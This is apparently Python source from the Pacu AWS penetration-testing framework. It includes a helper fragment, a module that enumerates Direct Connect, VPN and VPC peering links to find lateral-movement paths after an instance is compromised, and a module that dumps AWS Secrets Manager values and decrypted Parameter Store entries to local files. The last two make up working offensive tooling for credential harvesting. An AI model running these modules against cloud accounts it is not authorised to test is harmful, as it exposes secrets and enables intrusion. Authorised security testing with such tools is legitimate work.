def stringify(obj: Union[dict, list, datetime]) -> Union[dict, list, str]:
    """ The sqlalchemy-utils' JSONType doesn't accept Python datetime objects.
    This method converts all datetime objects in JSONizable data structures
    into strings, allowing the ORM to save them. """

    if isinstance(obj, dict):
        # If obj is a dict, iterate over its items and recusrively call
        # stringify on each of them.
        new_dict = dict()
        for k, v in obj.items():
            new_dict[k] = stringify(v)
        return new_dict

    elif isinstance(obj, list):
        # If obj is a list, iterate over its elements and recusrively call
        # stringify on each of them.
        new_list = list()
        for v in obj:
            new_list.append(stringify(v))
        return new_list

    elif isinstance(obj, datetime):
        # If obj is a datetime, return a formatted string version of it
        return str(obj.strftime("%a, %d %b %Y %H:%M:%S"))

    elif isinstance(obj, bytes):
        # If obj is bytes, return a formatted string version of it
        return obj.decode()

    else:
        return obj


def set_sigint_handler(exit_text: Optional[str]=None, value: Union[str, int]=0) -> None:

    def sigint_handler(signum, frame):
        """ This is to stop the error printed when CTRL+Cing out of the program
        so it can exit gracefully. """
        if exit_text is not None:
            print(exit_text)

        sys.exit(value)

    signal.signal(signal.SIGINT, sigint_handler)



#!/usr/bin/env python3
import argparse
from copy import deepcopy
from botocore.exceptions import ClientError


module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'vpc__enum_lateral_movement',

    # Name and any other notes about the author
    'author': 'Chris Farris <chris@room17.com>',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'LATERAL_MOVE',

    # One liner description of the module functionality. This shows up when a user searches for modules.
    'one_liner': 'Looks for Network Plane lateral movement opportunities.',

    # Full description about what the module does and how it works
    'description': 'Looks for DirectConnect, VPN or VPC Peering to understand where you can go once you compromise an instance inside a VPC.',

    # A list of AWS services that the module utilizes during its execution
    'services': ['EC2', 'DirectConnect'],

    # For prerequisite modules, try and see if any existing modules return the data that is required for your module before writing that code yourself, that way, session data can stay separated and modular.
    'prerequisite_modules': [],

    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab
    'arguments_to_autocomplete': ['--versions-all'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--versions-all', required=False, default=False, action='store_true', help='Grab all versions instead of just the latest')


# Main is the first function that is called when this module is executed
def main(args, pacu_main):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions
    ######

    regions = get_regions('DirectConnect')

    # Insert all VPCs into a dict indexed by ID for deduplication.
    vpcs_by_id = dict()
    if 'VPC' in session.VPC.keys():
        for vpc in session.VPC['VPC']:
            if 'VPC' in vpc.keys():
                vpcs_by_id[vpc['VPC']['VpcId']] = deepcopy(vpc)

    vpcs_found = 0
    vgw_assoc = {}
    summary_data = {
        'gateways': 0,
        'VPNs': 0,
        'peerings': 0,
    }
    for region in regions:
        print('Starting region {}...'.format(region))
        summary_data[region] = {}

        dx_client = pacu_main.get_boto3_client('directconnect', region)

        print("  Enumerating DirectConnect")
        try:
            gw_response = dx_client.describe_direct_connect_gateways()
            if 'directConnectGateways' in gw_response:
                gateway_count = len(gw_response['directConnectGateways'])
                summary_data[region]['gateways'] = gateway_count
                summary_data['gateways'] += gateway_count
                for dx_gw in gw_response['directConnectGateways']:
                    dx_gw_id = dx_gw['directConnectGatewayId']
                    assoc_response = dx_client.describe_direct_connect_gateway_associations(directConnectGatewayId=dx_gw_id)
                    if 'directConnectGatewayAssociations' in assoc_response:
                        for dx_assoc in assoc_response['directConnectGatewayAssociations']:
                            vgw_id = dx_assoc['virtualGatewayId']
                            vgw_region = dx_assoc['virtualGatewayRegion']
                            # Apparently Direct Connects work across region
                            # The Gateway can be in Virgina, but the VGW in Ohio.
                            vgw_attachment, vpc_data = get_vpc_by_vgw(pacu_main, vgw_id, vgw_region)
                            if vpc_data is not None:
                                # Ok, if we get here, we have a active DX VPC and opportunities for more exploration
                                # for analysis, we bundle up all the data, and key it off the VPC_ID
                                vpcs_by_id[vpc_data['VpcId']] = {
                                    'VPC': vpc_data,
                                    'VGW': vgw_attachment,
                                    'DirectConnectAssociation': dx_assoc,
                                    'DirectConnectGateway': dx_gw,
                                }
                                if vpc_data['VpcId'] not in vpcs_by_id:
                                    vpcs_found += 1
        except ClientError as error:
            print('    FAILURE:')
            code = error.response['Error']['Code']
            if code == 'UnauthorizedOperation':
                print('      MISSING NEEDED PERMISSIONS')
            else:
                print('      {}'.format(code))

        print("  Enumerating VPNs")
        # Now we look for VPN Connections
        try:
            ec2_client = pacu_main.get_boto3_client('ec2', region)
            vpn_response = ec2_client.describe_vpn_connections()
            if 'VpnConnections' in vpn_response:
                vpn_count = len(vpn_response['VpnConnections'])
                summary_data[region]['VPNs'] = vpn_count
                summary_data['VPNs'] += vpn_count
                for vpn in vpn_response['VpnConnections']:
                    vgw_id = vpn['VpnGatewayId']
                    if vgw_id in vgw_assoc:
                        vpc_data = vgw_assoc[vgw_id]
                    else:
                        vgw_attachment, vpc_data = get_vpc_by_vgw(pacu_main, vgw_id, region)
                    if vpc_data is not None:
                        vpc_id = vpc_data['VpcId']
                        if vpc_id not in vpcs_by_id:
                            vpcs_by_id[vpc_id] = {}
                            vpcs_found += 1
                        vpcs_by_id[vpc_id]['VPC'] = vpc_data
                        vpcs_by_id[vpc_id]['VPN'] = vpn
                        vpcs_by_id[vpc_id]['VGW'] = vgw_attachment
        except ClientError as error:
            print('    FAILURE:')
            code = error.response['Error']['Code']
            if code == 'UnauthorizedOperation':
                print('      MISSING NEEDED PERMISSIONS')
            else:
                print('      {}'.format(code))

        print("  Enumerating Peering")
        # And now VPC Peering
        try:
            pcx_response = ec2_client.describe_vpc_peering_connections()
            if 'VpcPeeringConnections' in pcx_response:
                peering_count = len(pcx_response['VpcPeeringConnections'])
                summary_data[region]['peerings'] = peering_count
                summary_data['peerings'] = peering_count
                for pcx in pcx_response['VpcPeeringConnections']:
                    if pcx['AccepterVpcInfo']['VpcId'] not in vpcs_by_id:
                        vpcs_by_id[pcx['AccepterVpcInfo']['VpcId']] = {}
                        # Go get the VPC data and put into results
                        vpc_data = get_vpc_by_id(pacu_main, pcx['AccepterVpcInfo']['VpcId'], pcx['AccepterVpcInfo']['Region'])
                        if vpc_data is not None:
                            vpcs_by_id[pcx['AccepterVpcInfo']['VpcId']]['VPC'] = vpc_data
                        else:
                            vpcs_by_id[pcx['AccepterVpcInfo']['VpcId']]['VPC'] = {'VpcId': pcx['AccepterVpcInfo']['VpcId']}
                        vpcs_found += 1
                    vpcs_by_id[pcx['AccepterVpcInfo']['VpcId']]['Peering'] = pcx

                    if pcx['RequesterVpcInfo']['VpcId'] not in vpcs_by_id:
                        vpcs_by_id[pcx['RequesterVpcInfo']['VpcId']] = {}
                        # Go get the VPC data and put into results
                        vpc_data = get_vpc_by_id(pacu_main, pcx['RequesterVpcInfo']['VpcId'], pcx['RequesterVpcInfo']['Region'])
                        if vpc_data is not None:
                            vpcs_by_id[pcx['RequesterVpcInfo']['VpcId']]['VPC'] = vpc_data
                        else:
                            vpcs_by_id[pcx['RequesterVpcInfo']['VpcId']]['VPC'] = {'VpcId': pcx['RequesterVpcInfo']['VpcId']}
                        vpcs_found += 1
                    vpcs_by_id[pcx['RequesterVpcInfo']['VpcId']]['Peering'] = pcx
        except ClientError as error:
            print('    FAILURE:')
            code = error.response['Error']['Code']
            if code == 'UnauthorizedOperation':
                print('      MISSING NEEDED PERMISSIONS')
            else:
                print('      {}'.format(code))

    vpc_data = deepcopy(session.VPC)
    vpc_data['VPC'] = list(vpcs_by_id.values())
    session.update(pacu_main.database, VPC=vpc_data)

    summary_data.update({
        'vpcs_found': vpcs_found,
        'vpcs_total': len(session.VPC)
    })
    return summary_data


def summary(data, pacu_main):
    out = '  {} Direct Connect Gateways found.\n'.format(data['gateways'])
    out += '  {} VPNs found.\n'.format(data['VPNs'])
    out += '  {} Peering Connections found.\n'.format(data['peerings'])
    out += '  {} new VPCs were found.\n'.format(data.get('vpcs_found', 0))
    out += '  {} VPCs are now known.\n'.format(data['vpcs_total'])
    return out


def get_vpc_by_vgw(pacu_main, vgw_id, vgw_region):
    ec2_client = pacu_main.get_boto3_client('ec2', vgw_region)
    vgw_response = ec2_client.describe_vpn_gateways(VpnGatewayIds=[vgw_id])
    if 'VpnGateways' in vgw_response and vgw_response['VpnGateways']:
        for vgw_attachment in vgw_response['VpnGateways'][0]['VpcAttachments']:
            vpc_id = vgw_attachment['VpcId']
            vpc_response = ec2_client.describe_vpcs(VpcIds=[vpc_id])
            return(vgw_attachment, vpc_response['Vpcs'][0])


def get_vpc_by_id(pacu_main, vpc_id, region):
    try:
        ec2_client = pacu_main.get_boto3_client('ec2', region)
        vpc_response = ec2_client.describe_vpcs(VpcIds=[vpc_id])
        return vpc_response['Vpcs'][0]
    except ClientError as error:
        print('  FAILURE:')
        code = error.response['Error']['Code']
        if code == 'UnauthorizedOperation':
            print('    MISSING NEEDED PERMISSIONS')
        else:
            print('    {}'.format(code))
        return None



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError, EndpointConnectionError
import os

from pacu.core.lib import strip_lines, save
from pacu import Main

module_info = {
    'name': 'enum__secrets',
    'author': 'Nick Spagnola From RSL',
    'category': 'ENUM',
    'one_liner': 'Enumerates and dumps secrets from AWS Secrets Manager and AWS parameter store',
    'description': 'This module will enumerate secrets in AWS Secrets Manager and AWS Systems manager parameter store.',
    'services': ['SecretsManager', 'SSM'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--regions',
                                  '--secrets-manager',
                                  '--parameter-store'
                                  ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument('--regions', required=False, help=strip_lines('''
    One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.
'''))
parser.add_argument('--secrets-manager', required=False, action="store_true", help="Enumerate secrets manager")
parser.add_argument('--parameter-store', required=False, action="store_true",
                    help="Enumerate Systems Manager parameter store")


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    args = parser.parse_args(args)
    print = pacu_main.print

    get_regions = pacu_main.get_regions

    summary_data = {"SecretsManager": 0, "ParameterStore": 0}

    if args.regions is None:
        regions = get_regions('secretsmanager')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print(
                'This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return None
    else:
        regions = args.regions.split(',')

    if args.secrets_manager is False and args.parameter_store is False:
        args.secrets_manager = args.parameter_store = True

    all_secrets_ids_sm = []
    all_secrets_ids_ssm = []

    for region in regions:
        secret_ids = []
        secrets_ssm = []

        print('Starting region {}...'.format(region))
        if args.secrets_manager:
            client = pacu_main.get_boto3_client('secretsmanager', region)

            response = None
            next_token = False
            while (response is None) or 'NextToken' in response:
                if next_token is False:
                    try:
                        response = client.list_secrets()
                    except ClientError as error:
                        code = error.response['Error']['Code']
                        print('FAILURE: ')
                        if code == 'UnauthorizedOperation':
                            print('  Access denied to ListSecrets.')
                        else:
                            print('  ' + code)
                        print('    Could not list secrets... Exiting')
                        response = None
                        break
                    except EndpointConnectionError as error:
                        print(
                            '    Error connecting to SecretsManager Endpoint for listing secrets for region: {}'.format(
                                region))
                        print('        Error: {}, {}'.format(error.__class__, str(error)))
                        response = None
                        break
                    except Exception as error:
                        print('    Generic Error when Listing SecretsManager for region: {}'.format(region))
                        print('        Error: {}, {}'.format(error.__class__, str(error)))
                        response = None
                        break

                else:
                    response = client.list_secrets()

                if response:
                    for secret in response['SecretList']:
                        secret_ids.append({"name": secret["Name"], "region": region})

            all_secrets_ids_sm += secret_ids

        for sec in all_secrets_ids_sm:
            secret_values = []
            client = pacu_main.get_boto3_client('secretsmanager', sec["region"])

            response = None
            while response is None:
                try:
                    response = client.get_secret_value(
                        SecretId=sec["name"]
                    )
                except ClientError as error:
                    code = error.response['Error']['Code']
                    print('FAILURE: ')
                    if code == 'UnauthorizedOperation':
                        print('  Access denied to GetSecretsValue.')
                    else:
                        print(' ' + code)
                    print('    Could not get secrets value... Exiting')
                    response = None
                    break
                except EndpointConnectionError as error:
                    print('    Error connecting to SecretsManager Endpoint for getting secret for region: {}'.format(
                        sec["region"]))
                    print('        Error: {}, {}'.format(error.__class__, str(error)))
                    response = None
                    break
                except Exception as error:
                    print('    Generic Error when getting Secret from Secrets Manager for region: {}'.format(
                        sec["region"]))
                    print('        Error: {}, {}'.format(error.__class__, str(error)))
                    response = None
                    break

            if response:
                with save('secrets/secrets_manager/secrets.txt', 'a') as f:
                    f.write("{}:{}\n".format(sec["name"], response["SecretString"]))

        if args.parameter_store:
            client = pacu_main.get_boto3_client('ssm', region)

            response = None
            while response is None:
                try:
                    response = client.describe_parameters()
                except ClientError as error:
                    code = error.response['Error']['Code']
                    print('FAILURE: ')
                    if code == 'UnauthorizedOperation':
                        print('  Access denied to DescribeParameters.')
                    else:
                        print(' ' + code)
                    print('    Could not list parameters... Exiting')
                    response = None
                    break
                except EndpointConnectionError as error:
                    print('    Error connecting to SSM Endpoint for describing SSM Parameters for region: {}'.format(
                        region))
                    print('        Error: {}, {}'.format(error.__class__, str(error)))
                    response = None
                    break
                except Exception as error:
                    print('    Generic Error when describing SSM Parameters for region: {}'.format(region))
                    print('        Error: {}, {}'.format(error.__class__, str(error)))
                    response = None
                    break

                if response:
                    for param in response["Parameters"]:
                        secrets_ssm.append({"name": param["Name"], "type": param["Type"], "region": region})

            all_secrets_ids_ssm += secrets_ssm

            for param in all_secrets_ids_ssm:
                client = pacu_main.get_boto3_client('ssm', param["region"])

                response = None
                while response is None:
                    if param["type"] != "SecureString":
                        try:
                            response = client.get_parameter(
                                Name=param["name"]
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to GetParameter.')
                            else:
                                print(' ' + code)
                            print('    Could not get parameter value... Exiting')
                            response = None
                            break
                        except EndpointConnectionError as error:
                            print('    Error connecting to SSM Endpoint for describing SSM '
                                  'Secure parameter for region: {}'.format(param["region"]))
                            print('        Error: {}, {}'.format(error.__class__, str(error)))
                            response = None
                        except Exception as error:
                            print('    Generic Error when describing SSM Secure Parameter '
                                  'for region: {}'.format(param['region']))
                            print('        Error: {}, {}'.format(error.__class__, str(error)))
                            response = None
                            break

                    else:
                        try:
                            response = client.get_parameter(
                                Name=param["name"],
                                WithDecryption=True
                            )
                        except ClientError as error:
                            code = error.response['Error']['Code']
                            print('FAILURE: ')
                            if code == 'UnauthorizedOperation':
                                print('  Access denied to GetParameter.')
                            else:
                                print(' ' + code)
                            print('    Could not get parameter value... Exiting')
                            response = None
                            break
                        except EndpointConnectionError as error:
                            print('    Error connecting to SSM Endpoint for describing '
                                  'SSM parameter for region: {}'.format(param["region"]))
                            print('        Error: {}, {}'.format(error.__class__, str(error)))
                            response = None
                            break
                        except Exception as error:
                            print('    Generic Error when describing SSM Parameter for region: {}'.format(
                                param['region']))
                            print('        Error: {}, {}'.format(error.__class__, str(error)))
                            response = None
                            break

                    if response:
                        with save('secrets/parameter_store/parameters.txt', 'a') as f:
                            f.write("{}:{}\n".format(param["name"], response["Parameter"]["Value"]))

    summary_data["SecretsManager"] = len(all_secrets_ids_sm)
    summary_data["ParameterStore"] = len(all_secrets_ids_ssm)

    # Make sure your main function returns whatever data you need to construct
    # a module summary string.
    return summary_data


# The summary function will be called by Pacu after running main, and will be
# passed the data returned from main. It should return a single string
# containing a curated summary of every significant thing that the module did,
# whether successful or not; or None if the module exited early and made no
# changes that warrant a summary being displayed. The data parameter can
# contain whatever data is needed in any structure desired. A length limit of
# 1000 characters is enforced on strings returned by module summary functions.
def summary(data, pacu_main: 'Main'):
    output = (
        "    {} Secret(s) were found in AWS secretsmanager\n'"
        "    {} Parameter(s) were found in AWS Systems Manager Parameter Store"
    ).format(data["SecretsManager"], data["ParameterStore"])
    output += "    \n    Check ~/.local/share/pacu/<session name>/downloads/secrets/ to get the values"
    return output
